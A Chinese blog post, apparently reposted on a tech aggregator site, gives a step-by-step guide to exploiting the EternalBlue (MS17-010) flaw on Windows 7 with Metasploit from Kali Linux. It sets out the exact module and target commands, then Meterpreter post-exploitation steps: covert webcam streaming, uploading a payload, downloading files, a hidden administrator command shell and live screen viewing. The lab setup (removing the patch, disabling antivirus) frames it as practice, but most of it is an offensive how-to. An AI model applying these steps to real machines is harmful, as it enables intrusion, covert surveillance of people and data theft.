IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 在Kali Linux下使用metasploit 的“永恒之蓝“漏洞对 Windows 7 进行攻击 渗透测试 -> 正文阅读

[系统运维]在Kali Linux下使用metasploit 的“永恒之蓝“漏洞对 Windows 7 进行攻击 渗透测试

准备环境:

1.安装Kali Linux的电脑或虚拟机(可以直接在官网上下载Vmx文件或ova文件)
2.安装有Windows 7 的计算机

准备工作:

1.卸载掉Windows 7的用于永恒之蓝的漏洞修补更新。
2.关闭Windows 7中的所有杀毒软件(例如:360,火绒,卡巴斯基)

实验开始:

1.Kali Linux 中搜索 metasploit framework 双击打开。在这里插入图片描述
2.输入密码(如果是直接在官网上下载的Vmx或ova文件的话,密码默认为kali )
在这里插入图片描述
3.等待一会儿,等到加载完成后,输入

use auxiliary/scanner/smb/smb_ms17_010

以使用ms17的漏洞模块。
在这里插入图片描述
4.随后输入

use exploit/windows/smb/ms17_010_eternalblue

以使用 ms17_010_eternalblue 模块。

5.回到Windows 7,在cmd中输入ipconfig回车,找到目标机的IP地址(此处为 192.168.0.104 )。
在这里插入图片描述6.在Kali Linux中输入
set rhosts 192.168.0.104
注意:rhosts 后的是你的目标机的IP地址!

7.最后输入

run

开始攻击!
在这里插入图片描述当出现 host is likely VULNERABLE 时说明目标机器有“永恒之蓝”漏洞。
在这里插入图片描述当看见win的时候,说明成功!
在这里插入图片描述
注意:如果你看到是下面这个图片:
在这里插入图片描述
请检查目标主机的防火墙是否关闭,安全软件是否禁用,如果还是不行,请重启目标主机。

入侵成功:

入侵成功后,你会发现目标主机什么动静都没有。
在这里插入图片描述
输入 help 查看一些命令
在这里插入图片描述

你会发现有许多你可以做的。
例如:
1.查看系统信息

sysinfo

在这里插入图片描述
2.监控摄像头
如果目标主机有摄像头。(或者你是笔记本电脑且使用了虚拟机,则你可以把摄像头连接到虚拟机)
输入命令查看摄像头列表:

webcam_list

输入命令连接摄像头

webcam_stream 1

其中stream后的数字是你在list中要连接的摄像头前的标号。
在这里插入图片描述
随后会自动打开浏览器,查看摄像头。保护隐私,所以用白框遮住了。
在这里插入图片描述
关闭浏览器,回到终端按ctrl — c 终止继续监控摄像头。

3.上传、下载文件
使用命令上传文件

upload 要上传的文件路径 上传到目标机器的路径

例如

upload /home/kali/Desktop/payload.exe C:\\Users\\Public\\Desktop

注意,要上传的目录路径必须用双重反斜杠 \\ !
在这里插入图片描述
可以看到,目标机桌面出现了文件。

使用命令下载文件

download 目标机文件位置路径 Kali下载到的路径

例如:

download C:\\123.txt /home/kali/Desktop

我们发现,Kali Linux桌面上出现了我们想要的文件
在这里插入图片描述
4.远程执行 cmd 命令
使用命令打开 cmd

execute -H -i -f cmd.exe

其中,execute表示运行, -H表示是建立隐藏进程(hide) 。
在这里插入图片描述
出现了熟悉的cmd界面,而且现在我们拥有管理员权限!
现在可以运行任意命令了,例如cd , tasklist , dir , del 等。

要退出cmd的话只要输入exit即可,如果它问你 Terminate channel xxx ? [y/N] ,输入y后按回车。

5.实时观察目标机在干什么
输入命令
screenshare
在这里插入图片描述
成功!
返回终端,按ctrl — c 终止。

6.还有很多命令
还有很多命令,输入 help 查看,后面都有详细的命令解释。

7.退出meterprefer
输入命令

exit

如果要再次控制,输入run即可。

至此,对 Windows 7 攻击成功!

注意:不推荐你一直 exit 再 run 再 exit 再 run ,否则会使得目标机蓝屏。
在这里插入图片描述

再次注意

关闭360,火绒等杀毒软件,不然的话:
在这里插入图片描述

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-08-10 13:50:40  更:2021-08-10 13:51:23 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 3:41:21-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计